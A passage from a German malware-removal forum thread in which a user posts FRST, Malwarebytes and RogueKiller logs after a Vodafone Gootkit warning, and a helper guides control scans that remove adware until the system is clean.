HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-716491260-3257532223-3478221735-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKU\S-1-5-21-716491260-3257532223-3478221735-1001 -> {70A7EBAE-DA5A-4BBF-ADEA-6ECF768BF958} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=MGX&o=15359&src=kw&q={searchTerms}&locale=de_DE&apn_ptnrs=^JQ&apn_dtid=^YYYYYY^YY^DE&apn_uid=79DE322B-A6B7-46C4-ACAD-51A5594CEA42&apn_sauid=ADB29B8A-9FD7-4DC6-9AFE-C5F3256C5419
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll Keine Datei

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2016-07-16 12:47 - 2016-07-16 12:45 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-716491260-3257532223-3478221735-1001\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: Datenträger ist nicht mit dem Internet verbunden.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [TCP Query User{CE9C1186-67B2-400F-98F2-20FB6DD79B5C}C:\program files\common files\magix services\qmxnetworksync\qmxnetworksync.exe] => (Block) C:\program files\common files\magix services\qmxnetworksync\qmxnetworksync.exe (MAGIX Software GmbH -> MAGIX)
FirewallRules: [UDP Query User{E66413C3-47F1-4761-B3FC-7538B9805D70}C:\program files\common files\magix services\qmxnetworksync\qmxnetworksync.exe] => (Block) C:\program files\common files\magix services\qmxnetworksync\qmxnetworksync.exe (MAGIX Software GmbH -> MAGIX)

==================== Wiederherstellungspunkte =========================

16-10-2020 09:03:00 Windows Modules Installer
24-10-2020 15:16:35 Windows Modules Installer
12-11-2020 19:01:41 
12-11-2020 19:01:57 Windows Update
22-11-2020 18:12:18 Konfiguriert AeroFly Professional Deluxe AddOn 3 (True Scale Add?à*!0
11-12-2020 10:35:05 Windows Modules Installer
31-12-2020 16:19:29 Windows Modules Installer
13-01-2021 22:03:54 Removed Adobe Acrobat Reader DC - Deutsch.

==================== Fehlerhafte Geräte im Gerätemanager ============


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (01/14/2021 12:25:04 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/14/2021 12:25:03 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 11:58:46 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 11:58:45 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 11:52:29 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 11:52:28 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 10:56:06 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (01/13/2021 10:56:04 PM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)


Systemfehler:
=============
Error: (01/14/2021 12:56:16 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "McAfee WebAdvisor" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:54:15 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "InCDsrvR" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:54:15 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "InCDsrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:45:59 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "McAfee WebAdvisor" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:43:57 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "InCDsrvR" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:43:57 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "InCDsrv" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:33:02 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "McAfee WebAdvisor" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (01/14/2021 12:31:01 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "IKE- und AuthIP IPsec-Schlüsselerstellungsmodule" wurde mit folgendem Fehler beendet: 
Der an einen Systemaufruf übergebene Datenbereich ist zu klein.


Windows Defender:
===================================
Date: 2021-01-14 00:27:12.9680000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {A1AC5C3B-B2EF-4DB9-963A-97F1040F6CB9}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-13 23:59:41.3680000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {D74B78B1-CDE6-44EB-94BF-D6CA034E2A30}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-13 23:53:50.0850000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {8366B6AF-A5E6-4FC3-ACAC-B3C211DEF29D}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-13 23:04:54.0390000Z
Description: 
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {DFA6E748-E7A7-41F1-B845-126F71135B05}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2021-01-14 01:04:18.5290000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-14 01:04:18.5280000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiSpyware
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-14 01:04:18.5280000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-14 01:04:18.5230000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiVirus
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

Date: 2021-01-14 01:04:18.5230000Z
Description: 
Bei Microsoft Defender Antivirus ist ein Fehler beim Aktualisieren der Sicherheitsinformationen aufgetreten.
Neue Version der Sicherheitsinformationen: 
%Vorherige Version der Sicherheitsinformationen: 1.269.1925.0
Update Source: Microsoft Center zum Schutz vor Schadsoftware
Sicherheitstyp: AntiSpyware
Updatetyp: Voll
Benutzer: NT-AUTORITÄT\Netzwerkdienst
Aktuelle Modulversion: 
%Vorherige Modulversion: 1.1.14901.4
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden. 

CodeIntegrity:
===================================

Date: 2021-01-13 20:42:22.8280000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.8230000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.7690000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:42:22.7530000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3530000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3470000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3400000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

Date: 2021-01-13 20:37:21.3350000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SIHClient.exe) attempted to load \Device\HarddiskVolume4\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: FUJITSU // American Megatrends Inc. V4.6.5.3 R1.23.0 for D3162-A1x 12/01/2014
Hauptplatine: FUJITSU D3162-A1
Prozessor: Intel(R) Core(TM) i5-3570 CPU @ 3.40GHz
Prozentuale Nutzung des RAM: 33%
Installierter physikalischer RAM: 8107.74 MB
Verfügbarer physikalischer RAM: 5374.35 MB
Summe virtueller Speicher: 12203.74 MB
Verfügbarer virtueller Speicher: 8542.01 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:930.12 GB) (Free:708.46 GB) NTFS
Drive f: (Daten) (Fixed) (Total:634.76 GB) (Free:269.72 GB) NTFS
Drive g: (Volume) (Fixed) (Total:296.75 GB) (Free:167.42 GB) NTFS
Drive i: () (Removable) (Total:58.85 GB) (Free:58.82 GB) exFAT

\\?\Volume{897fd41d-0000-0000-0000-100000000000}\ () (Fixed) (Total:0.49 GB) (Free:0.45 GB) NTFS
\\?\Volume{897fd41d-0000-0000-0000-d0a6e8000000}\ () (Fixed) (Total:0.91 GB) (Free:0.41 GB) NTFS

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 931.5 GB) (Disk ID: 8D638B93)
Partition 1: (Not Active) - (Size=634.8 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=296.7 GB) - (Type=07 NTFS)

==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 897FD41D)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=930.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=928 MB) - (Type=27)

==========================================================
Disk: 2 (Protective MBR) (Size: 58.9 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================
         

Alt 14.01.2021, 01:27   #12
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Kontrollscans mit MBAM und RK

Wir sind fast fertig. Jetzt ist es an der Zeit für Kontrollscans mit
Poste nach Abschluss der beiden Scans die Logs in CODE-Tags.

Alt 14.01.2021, 02:26   #13
Andy4Peter
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Einmal reinmachen:

MBAM
Code:
ATTFilter
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 14.01.21
Scan-Zeit: 01:58
Protokolldatei: a47b48c4-5603-11eb-8601-001999f897fb.json

-Softwaredaten-
Version: 4.3.0.98
Komponentenversion: 1.0.1130
Version des Aktualisierungspakets: 1.0.35699
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 10 (Build 19041.685)
CPU: x64
Dateisystem: NTFS
Benutzer: ESPRIMO\Peter

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 336021
Erkannte Bedrohungen: 12
In die Quarantäne verschobene Bedrohungen: 12
Abgelaufene Zeit: 2 Min., 39 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 1
PUP.Optional.ASK, HKU\S-1-5-21-716491260-3257532223-3478221735-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{70A7EBAE-DA5A-4BBF-ADEA-6ECF768BF958}, In Quarantäne, 2966, 258187, 1.0.35699, , ame, , , 

Registrierungswert: 1
PUP.Optional.ASK, HKU\S-1-5-21-716491260-3257532223-3478221735-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{70A7EBAE-DA5A-4BBF-ADEA-6ECF768BF958}|URL, In Quarantäne, 2966, 258187, 1.0.35699, , ame, , , 

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 7
PUP.Optional.Converter, C:\USERS\PETER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\Q8P7EA2O.DEFAULT\BROWSER-EXTENSION-DATA\WEB@CONVERTER, In Quarantäne, 8788, 506347, 1.0.35699, , ame, , , 
PUP.Optional.MindSpark.Generic, C:\USERS\PETER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\Q8P7EA2O.DEFAULT\BROWSER-EXTENSION-DATA\_65Members_@download.fromdoctopdf.com, In Quarantäne, 8398, 782572, 1.0.35699, , ame, , , 
PUP.Optional.MindSpark.Generic, C:\USERS\PETER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\Q8P7EA2O.DEFAULT\BROWSER-EXTENSION-DATA\_ceMembers_@free.easypdfcombine.com, In Quarantäne, 8398, 782572, 1.0.35699, , ame, , , 
PUP.Optional.MindSpark.Generic, C:\USERS\PETER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\Q8P7EA2O.DEFAULT\BROWSER-EXTENSION-DATA\_flMembers_@free.myformsfinder.com, In Quarantäne, 8398, 782572, 1.0.35699, , ame, , , 
PUP.Optional.MindSpark.Generic, C:\USERS\PETER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\Q8P7EA2O.DEFAULT\BROWSER-EXTENSION-DATA\_j5Membersttab03_@ext.ask.com, In Quarantäne, 8398, 782572, 1.0.35699, , ame, , , 
PUP.Optional.MindSpark.Generic, C:\USERS\PETER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\Q8P7EA2O.DEFAULT\BROWSER-EXTENSION-DATA\_j7Membersttab03_@www.convertdocsonline.com, In Quarantäne, 8398, 782572, 1.0.35699, , ame, , , 
PUP.Optional.MindSpark.Generic, C:\USERS\PETER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\Q8P7EA2O.DEFAULT\BROWSER-EXTENSION-DATA\_l6Membersttab03_@www.propdfconverter.com, In Quarantäne, 8398, 782572, 1.0.35699, , ame, , , 

Datei: 3
PUP.Optional.Converter, C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default\browser-extension-data\web@Converter\storage.js, In Quarantäne, 8788, 506347, , , , , 99914B932BD37A50B983C5E7C90AE93B, 44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
PUP.Optional.MindSpark.Generic, C:\Users\Peter\AppData\Roaming\Mozilla\Firefox\Profiles\q8p7ea2o.default\browser-extension-data\_ceMembers_@free.easypdfcombine.com\storage.js.migrated, In Quarantäne, 8398, 782572, , , , , 7AE1366C9A336A1F60A355DD7CAAA0E9, 7513CAA8B66B0E29CBA9BD90C56B0D52807EE0CA10E8CF1B9F077B4FAC814BCE
PUP.Optional.ASK, C:\WINDOWS\INSTALLER\2793150.MSI, In Quarantäne, 2966, 113867, 1.0.35699, , ame, , F64D2FE4C4320ECE679D6D241F8B6837, FE66468653EFE9FE91C7B0C53185E7E98E2F0CA25FC8ED675E8D25BEBB73C0AC

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

WMI: 0
(keine bösartigen Elemente erkannt)


(end)
         
roguekiller
Code:
ATTFilter
RogueKiller Anti-Malware V14.8.4.0 (x64) [Jan 13 2021] (Free) von Adlice Software
Mail : https://adlice.com/contact/
Website : https://adlice.com/download/roguekiller/
Betriebssystem : Windows 10 (10.0.19041) 64 bits
Gestartet in : Normaler Modus
Benutzer : Peter [Administrator]
Gestartet von : H:\RogueKiller_portable64.exe
Signaturen : 20210111_142503, Treiber : Geladen
Modus : Standard-Scan, Löschen -- Datum : 2021/01/14 02:15:51 (Dauer : 00:07:54)

¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Löschen ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[PUP.Gen1 (Potenziell bösartig)] HKEY_LOCAL_MACHINE\Software\simplitec --  -> Gelöscht
[PUP.Gen1 (Potenziell bösartig)] HKEY_USERS\S-1-5-21-716491260-3257532223-3478221735-1001\Software\simplitec --  -> Gelöscht
[PUP.Gen1 (Potenziell bösartig)] simplitec -- %programdata%\simplitec -> Gelöscht
  => ComputerID.dat -- C:\PROGRA~3\SIMPLI~1\COMPUT~1.DAT -> Gelöscht
  => 2017-05-12 -- C:\PROGRA~3\SIMPLI~1\SIMPLI~1\reports\2017-0~1 -> Gelöscht
  => 2017-09-19 -- C:\PROGRA~3\SIMPLI~1\SIMPLI~1\reports\2017-0~2 -> Gelöscht
  => 2020-11-17 -- C:\PROGRA~3\SIMPLI~1\SIMPLI~1\reports\2020-1~1 -> Gelöscht
  => reports -- C:\PROGRA~3\SIMPLI~1\SIMPLI~1\reports -> Gelöscht
  => simplitec Power Suite -- C:\PROGRA~3\SIMPLI~1\SIMPLI~1 -> Gelöscht
         

Kennst Du für Firefox ein Addon das https forciert, aber Ausnahmen zulässt, z.B. die lokale Solaranlage, die nur per http liefert? Meinte das hier irgendwo beim stöbern gelesen zu haben.

Alt 14.01.2021, 02:40   #14
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



Bitte zur Kontrolle MBAM wiederholen.

Alt 14.01.2021, 02:49   #15
Andy4Peter
 
vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Standard

vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet



geschätzter Cosinus, MBAM ist ohne Erkennungen, so langsam ruft das Bett
Vielen Dank, dass Du Dir mit mir die Nacht um die Ohren gehauen hast.

Thema geschlossen

Themen zu vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet
.dll, 192.168.0.2, administrator, adobe, adobe flash player, bonjour, cpu, defender, explorer, firefox, firewall, flash player, gootkit, homepage, internet, internet explorer, mozilla, nvidia, programme, prozesse, registry, scan, software, suchmaschine, svchost.exe, vodafone, windows xp



Ähnliche Themen: vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet


  1. Mail von Vodafone, Anschluss mit Gootkit befallen
    Log-Analyse und Auswertung - 17.12.2020 (34)
  2. Laut Vodafone angeblich mit Gootkit befallen
    Plagegeister aller Art und deren Bekämpfung - 05.12.2020 (28)
  3. Mail von Vodafone. Eventueller Gootkit Befall.
    Plagegeister aller Art und deren Bekämpfung - 30.10.2020 (2)
  4. Verdächtige Einträge Firewall
    Antiviren-, Firewall- und andere Schutzprogramme - 29.06.2016 (2)
  5. Registry Einträge löschen Wichtig?
    Plagegeister aller Art und deren Bekämpfung - 27.07.2014 (9)
  6. seltsame Registry-Einträge?
    Überwachung, Datenschutz und Spam - 19.09.2013 (4)
  7. S.M.A.R.T. HDD löscht registry einträge
    Log-Analyse und Auswertung - 02.05.2012 (2)
  8. Infizierung in der Registry
    Log-Analyse und Auswertung - 16.10.2011 (57)
  9. Registry Einträge ? ....
    Log-Analyse und Auswertung - 09.09.2011 (3)
  10. Möglicherweise infiziert,verdächtige Einträge im Taskmanager und HJT-Log
    Plagegeister aller Art und deren Bekämpfung - 28.01.2010 (2)
  11. Verdächtige Messenger Einträge
    Plagegeister aller Art und deren Bekämpfung - 25.11.2009 (47)
  12. Registry einträge unbewust gelöscht
    Alles rund um Windows - 14.12.2006 (3)
  13. Verdächtige 017er Einträge im hjt-logfile fixen?!
    Log-Analyse und Auswertung - 06.12.2006 (1)
  14. Logfile, verdächtige Einträge
    Log-Analyse und Auswertung - 08.06.2006 (7)
  15. Merkwürdige Einträge i. d. Registry
    Plagegeister aller Art und deren Bekämpfung - 14.09.2005 (1)
  16. seltsame registry einträge - viren???
    Plagegeister aller Art und deren Bekämpfung - 28.02.2005 (24)

Zum Thema vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet - Mein Schwiegervater hat von Vodafone eMails und Brief erhalten, dass eine Gootkit-Infektion dem Haushalt zugeordnet wird. Da es nur einen Windows-Rechner gibt ist die Auswahl nicht groß. Leider hat hier - vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet...
Archiv
Du betrachtest: vodafone reklamiert eine GOOTKIT-Infizierung - verdächtige registry-Einträge sind gesichtet auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.